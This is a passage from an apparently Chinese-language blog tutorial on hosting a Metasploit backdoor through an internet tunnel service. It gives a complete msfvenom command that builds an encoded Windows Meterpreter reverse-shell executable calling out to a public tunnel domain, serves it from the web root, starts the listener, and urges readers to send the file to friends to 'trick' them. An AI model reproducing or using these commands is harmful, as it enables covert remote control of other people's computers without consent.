选择tcp协议,填一个可以使用的端口号。
开通隧道后可以在 隧道管理 中看到自己的隧道信息:
记住这里的 隧道id,赠送域名 以及 隧道端口,下面会用到。
首先在kali linux中下载对应的客户端,选择Linux 64位版本。
启动隧道:
./sunny clientid 隧道id
启动多个隧道:
./sunny clientid 隧道id,隧道id
要想后台运行可以使用 setsid 命令:
setsid ./sunny clientid 隧道id &
隧道连接成功后会显示:
sudo su msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe
这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。
如果想要在软件中绑定后门,按照 渗透测试(一)-Metasploit生成免杀后门(内网篇) 文中第7步就行,注意修改LHOST和LPORT。
msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 127.0.0.1 set LPORT 10716 run
同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!
如果觉得此篇文章对你有帮助,关注我的公众号【人人皆是程序员】就是对我最大的鼓励与认可!